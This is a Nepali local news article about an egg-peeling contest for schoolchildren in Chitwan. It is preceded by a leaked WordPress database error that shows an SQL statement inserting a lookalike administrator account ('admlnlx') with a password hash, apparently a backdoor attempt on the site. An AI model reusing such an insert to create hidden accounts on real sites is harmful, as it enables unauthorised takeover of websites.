WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeF2ERczkjhCDucEiI97fknqQYy4dM/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 20:58:15', '', 'admlnlx', 'admlnlx')
चितवन, माघ २५–
कुखुराको राजधानीको रुपमा चिनिएको चितवनमा अण्डालाई प्रवद्र्धन गर्न आज –मंगलबार) अण्डा खोस्टाउने प्रतियोगिता गरिएको छ ।
नेपाल अण्डा उत्पादक संघ, बाल माविद अल्मुनाई एशोसियसनको सहयोगमा लियो क्लव अफ नारायणगढ र लायन्स क्लव अफ नारायणगढको संयुक्त आयोजनामा कार्यक्रम गरिएको हो ।
बालकुमारी उच्च मावि नारायणगढमा आयोजित सो कार्यक्रममा विद्यालयका ६ देखि ९ कक्षा सम्मका १२ जना विद्यार्थीले भाग लिएका थिए । प्रतियोगितामा २ मिनेटको समयमा ७ वटा अण्डा खोस्टाउँदै कक्षा ७ की एलिना परियार र कक्षा ८ का प्रकाश पौडेल प्रथम, ६ वटा अण्डा खोस्टाउँदै कक्षा ६ का नविन जैसी र कक्षा ७ की मनिषा शाह द्धितिय र ५ वटा अण्डा खोस्टाउँदै कक्षा ८ का गुड्डु गुप्ता र कुन्दन साह तृतीय भए ।

बिजेताहरुलाई लायन्स क्लव अफ नारायणगढका अध्यक्ष उमेश पिया, लियो क्लव अफ नारायणगढका अध्यक्ष राजु चौधरी र बालकुमारी उच्च माविका प्रधानाध्यापक नारायणबहादुर थापाले पुरस्कार प्रदान गर्नुभयो । कार्यक्रममा लियो क्लव अफ नाराणगढका निवर्तमान अध्यक्ष ज्ञानेन्द्र पौडेल, विद्यालयका शिक्षक नारायण ढकाल, क्लवका सदस्यहरुलगायतको उल्लेखीय सहभागिता रहेको थियो ।




